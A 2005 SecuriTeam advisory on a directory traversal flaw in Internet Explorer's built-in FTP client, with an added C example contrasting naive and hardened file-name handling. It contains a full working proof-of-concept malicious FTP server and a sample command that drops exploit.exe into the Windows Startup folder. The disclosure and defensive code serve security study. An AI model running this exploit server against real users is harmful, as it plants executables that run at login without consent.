[NT] Internet Explorer FTP Client Directory Traversal


Date: 4 Jan 2005 18:27:47 +0200
From: SecuriTeam <support@securiteam.com>
To: [email protected]
Subject: [NT] Internet Explorer FTP Client Directory Traversal

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com




  Internet Explorer FTP Client Directory Traversal
------------------------------------------------------------------------


SUMMARY

Internet Explorer comes with a built-in FTP client. That client has been 
found to contain a directory traversal vulnerability: a malicious FTP 
server can cause a file the user chooses to download to be written to any 
directory the server's operator picks (for example a Startup folder), 
rather than the one the user selected, and without the user's consent.

DETAILS

Vulnerable Systems:
 * Internet Explorer version 6.0.3790.0 and prior

Internet Explorer's FTP file retrieval code allows a remote attacker who 
controls an FTP server to make a client that innocently downloads a file 
create or overwrite a file in any folder the attacker chooses. The server 
returns a directory listing whose file name contains a directory traversal 
sequence ("/../../..", followed by the target path), and the client 
appends that name to the destination folder without sanitizing it.

The attack works with either of the following download methods:
 * Right click -> "Copy to Folder"
 * Drag and Drop

In either case the file is stored in a folder different from the one the 
user selected.
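The following is an added example, not part of the 7a69 advisory or its proof of concept, showing the client-side half of the problem: how the name field is pulled out of a UNIX-style LIST entry, the naive folder+name join that the advisory describes (which lets "/../../..\..." walk out of the chosen folder), and a hardened version that accepts only a single path component. POC_LINE reproduces the listing line the advisory's server emits for its sample command line; BENIGN_LINE, the destination folder and all function names are constructed for this example.

```c
/* Added example (not the advisory's code): deriving a local file name
 * from an FTP LIST entry, naive versus hardened. POC_LINE is the line the
 * advisory's PoC server sends; BENIGN_LINE is a constructed ordinary entry. */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define NAME_MAX_LEN 512

#define POC_LINE \
 "-rwxrwxrwx    1 0        0              1 Dec 08 07:36 " \
 "/../../../../../../../../../../..\\Documents and settings\\All Users\\" \
 "Start menu\\Programs\\Startup\\exploit.exe\r\n"
#define BENIGN_LINE \
 "-rw-r--r--    1 0        0              1 Dec 08 07:36 readme.txt\r\n"

/* Return the name field of a UNIX-style "ls -l" listing line: everything
 * after the eighth blank-separated field (names may contain spaces), or
 * NULL if the line has fewer fields. The result still carries the CRLF. */
static const char *list_entry_name(const char *line)
{
 const char *p = line;
 for (int field = 0; field < 8; field++) {
  while (*p == ' ' || *p == '\t') p++;
  if (*p == '\0' || *p == '\r' || *p == '\n') return NULL;
  while (*p && *p != ' ' && *p != '\t') p++;
 }
 while (*p == ' ' || *p == '\t') p++;
 return (*p && *p != '\r' && *p != '\n') ? p : NULL;
}

/* What the vulnerable client effectively does: append the server-supplied
 * name to the chosen folder as-is, so "/../..\..." climbs out of it. */
static bool naive_path_for_entry(const char *dest_folder, const char *line,
                                 char *out, size_t outlen)
{
 const char *name = list_entry_name(line);
 if (!name) return false;
 int n = snprintf(out, outlen, "%s\\%.*s", dest_folder,
                  (int)strcspn(name, "\r\n"), name);
 return n > 0 && (size_t)n < outlen;
}

/* Hardened: accept the name only if it is a single path component.
 * Rejects either separator (the PoC mixes '/' and '\'), ':' (drive letters
 * and NTFS streams), control characters, "." and "..". */
static bool safe_local_name(const char *remote, char *out, size_t outlen)
{
 size_t len = strcspn(remote, "\r\n");
 if (len == 0 || len >= outlen) return false;
 for (size_t i = 0; i < len; i++) {
  unsigned char c = (unsigned char)remote[i];
  if (c == '/' || c == '\\' || c == ':' || c < 0x20) return false;
 }
 if ((len == 1 && remote[0] == '.') ||
     (len == 2 && remote[0] == '.' && remote[1] == '.')) return false;
 memcpy(out, remote, len);
 out[len] = '\0';
 return true;
}

/* Hardened pipeline for one listing line: fills out with
 * "<dest_folder>\<name>" and returns true only if the name was accepted. */
static bool safe_path_for_entry(const char *dest_folder, const char *line,
                                char *out, size_t outlen)
{
 char component[NAME_MAX_LEN];
 const char *name = list_entry_name(line);
 if (!name || !safe_local_name(name, component, sizeof component)) return false;
 int n = snprintf(out, outlen, "%s\\%s", dest_folder, component);
 return n > 0 && (size_t)n < outlen;
}

int main(void)
{
 /* Destination folder is an assumption for the demonstration. */
 const char *folder = "C:\\Documents and Settings\\victim\\Desktop";
 const char *lines[] = { POC_LINE, BENIGN_LINE };
 char path[1024];
 for (size_t i = 0; i < 2; i++) {
  printf("naive: %s\n", naive_path_for_entry(folder, lines[i], path, sizeof path) ? path : "(rejected)");
  printf("safe : %s\n", safe_path_for_entry(folder, lines[i], path, sizeof path) ? path : "(rejected)");
 }
 return 0;
}
```

The hardened check rejects rather than strips: a client that instead keeps the basename must treat both '/' and '\' as separators, since the PoC's listing entry uses both, and must still refuse "." and "..".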

Exploit:
A sample command line to run this exploit code. The first argument is the 
file served to the client (the payload), the second is where it is written 
once the "../" sequence in the listing has climbed to the root of the drive 
holding the download folder. The server binds TCP port 21, so it needs the 
privilege to do that:
./ftp_dir_tra ./exploit.exe '\Documents and settings\All Users\Start menu\Programs\Startup\exploit.exe'

/*
 * Internet Explorer FTP download path disclosure proof of concept
 * (7a69Adv#17)
 *
 *   DOES NOT WORK USING PASV MODE, YOU MUST CODE IT IF YOU WANT !!!
 *
 * Minimal active-mode FTP server. It accepts one client session, answers
 * the control-channel commands IE sends with canned replies, returns a
 * single LIST entry whose file name is a "/../../..<remote_file>"
 * traversal path, and serves the contents of <local_file> on RETR.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>

#define MAX_BUF  1024
#define FTP_PORT 21

int main(int argc, char **argv) {
 char buffer[MAX_BUF + 1];
 char ipbuf[MAX_BUF + 1];
 char *local_file, *remote_file;
 int sfdmain, sfdses, sfddata = -1;
 int readed;
 int one = 1;
 int ip1, ip2, ip3, ip4, port1, port2;
 int fd;
 struct sockaddr_in ftpmain;
 struct sockaddr_in ftpdata;

 if (argc < 3) {
  printf("\t7a69Adv#17 - Internet Explorer FTP download path disclosure proof of concept\n");
  printf("Use:\n");
  printf("\t%s <local_file> <remote_file>\n", argv[0]);
  exit(0);
 }

 local_file = argv[1];   /* file served to the client (the payload) */
 remote_file = argv[2];  /* path the traversal entry points the client at */

 if ((fd = open(local_file, O_RDONLY)) == -1) {
  perror("open()");
  exit(-1);
 }

 if ((sfdmain = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  perror("socket()");
  exit(-1);
 }
 /* Allow a quick restart while the previous session sits in TIME_WAIT. */
 setsockopt(sfdmain, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));

 memset(&ftpmain, 0, sizeof(ftpmain));
 ftpmain.sin_family = AF_INET;
 ftpmain.sin_port = htons(FTP_PORT);
 ftpmain.sin_addr.s_addr = INADDR_ANY;

 if (bind(sfdmain, (struct sockaddr *)&ftpmain, sizeof(ftpmain)) == -1) {
  perror("bind()");
  exit(-1);
 }

 if (listen(sfdmain, 1) == -1) {
  perror("listen()");
  exit(-1);
 }

 if ((sfdses = accept(sfdmain, NULL, NULL)) == -1) {
  perror("accept()");
  exit(-1);
 }

 /* Greeting on the control channel. */
 write(sfdses, "200 OK\r\n", 8);

 while ((readed = read(sfdses, buffer, MAX_BUF)) > 0) {
  buffer[readed] = 0;
  printf(">> %s", buffer);
  if (!strncasecmp(buffer, "NOOP", 4)) write(sfdses, "200 OK\r\n", 8);
  else if (!strncmp(buffer, "USER ", 5)) write(sfdses, "331 OK\r\n", 8);
  else if (!strncmp(buffer, "PASS ", 5)) write(sfdses, "230 OK\r\n", 8);
  else if (!strncmp(buffer, "CWD ", 4)) write(sfdses, "250 OK\r\n", 8);
  else if (!strncmp(buffer, "PWD", 3)) write(sfdses, "257 \"/\"\r\n", 9);
  else if (!strncmp(buffer, "TYPE ", 5)) write(sfdses, "200 OK\r\n", 8);
  else if (!strncmp(buffer, "PORT ", 5)) {
   /* Active mode: the client tells us where to connect the data channel
    * (h1,h2,h3,h4,p1,p2). %d rather than %i so "08"/"09" are not read as octal. */
   if (sscanf(&buffer[5], "%d,%d,%d,%d,%d,%d", &ip1, &ip2, &ip3, &ip4, &port1, &port2) != 6) {
    write(sfdses, "501 OK\r\n", 8);
    continue;
   }
   snprintf(ipbuf, MAX_BUF, "%d.%d.%d.%d", ip1, ip2, ip3, ip4);
   memset(&ftpdata, 0, sizeof(ftpdata));
   ftpdata.sin_family = AF_INET;
   ftpdata.sin_addr.s_addr = inet_addr(ipbuf);
   ftpdata.sin_port = htons(port1 * 256 + port2);
   if (sfddata != -1) close(sfddata);
   if ((sfddata = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    perror("socket()");
    exit(-1);
   }
   if (connect(sfddata, (struct sockaddr *)&ftpdata, sizeof(ftpdata)) == -1) {
    write(sfdses, "421 OK\r\n", 8);
    close(sfddata);
    sfddata = -1;
   } else {
    write(sfdses, "220 OK\r\n", 8);  /* reply kept from the original PoC */
   }
  }
  else if (!strncmp(buffer, "LIST", 4)) {
   if (sfddata == -1) { write(sfdses, "425 OK\r\n", 8); continue; }
   write(sfdses, "150 OK\r\n", 8);
   /* The single listing entry: a valid-looking "ls -l" line whose name
    * climbs out of the download folder and into remote_file. */
   snprintf(buffer, MAX_BUF,
            "-rwxrwxrwx    1 0        0              1 Dec 08 07:36 "
            "/../../../../../../../../../../..%s\r\n", remote_file);
   write(sfddata, buffer, strlen(buffer));
   close(sfddata);
   sfddata = -1;
   write(sfdses, "226 OK\r\n", 8);
  }
  else if (!strncmp(buffer, "RETR ", 5)) {
   if (sfddata == -1) { write(sfdses, "425 OK\r\n", 8); continue; }
   write(sfdses, "150 OK\r\n", 8);
   /* Serve local_file regardless of the name the client asked for. */
   lseek(fd, 0, SEEK_SET);
   while ((readed = read(fd, buffer, MAX_BUF)) > 0)
    write(sfddata, buffer, readed);
   close(sfddata);
   sfddata = -1;
   write(sfdses, "226 OK\r\n", 8);
  }
  else if (!strncmp(buffer, "QUIT", 4)) {
   write(sfdses, "221 OK\r\n", 8);
   break;
  }
  else
   write(sfdses, "500 WTF\r\n", 9);
 }

 if (sfddata != -1) close(sfddata);
 close(sfdses);
 close(sfdmain);
 close(fd);
 return 0;
}


ADDITIONAL INFORMATION

The information has been provided by Albert Puigsech Galicia 
<ripe@7a69ezine.org>.
The original article can be found at:
http://www.7a69ezine.org/node/view/176





DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
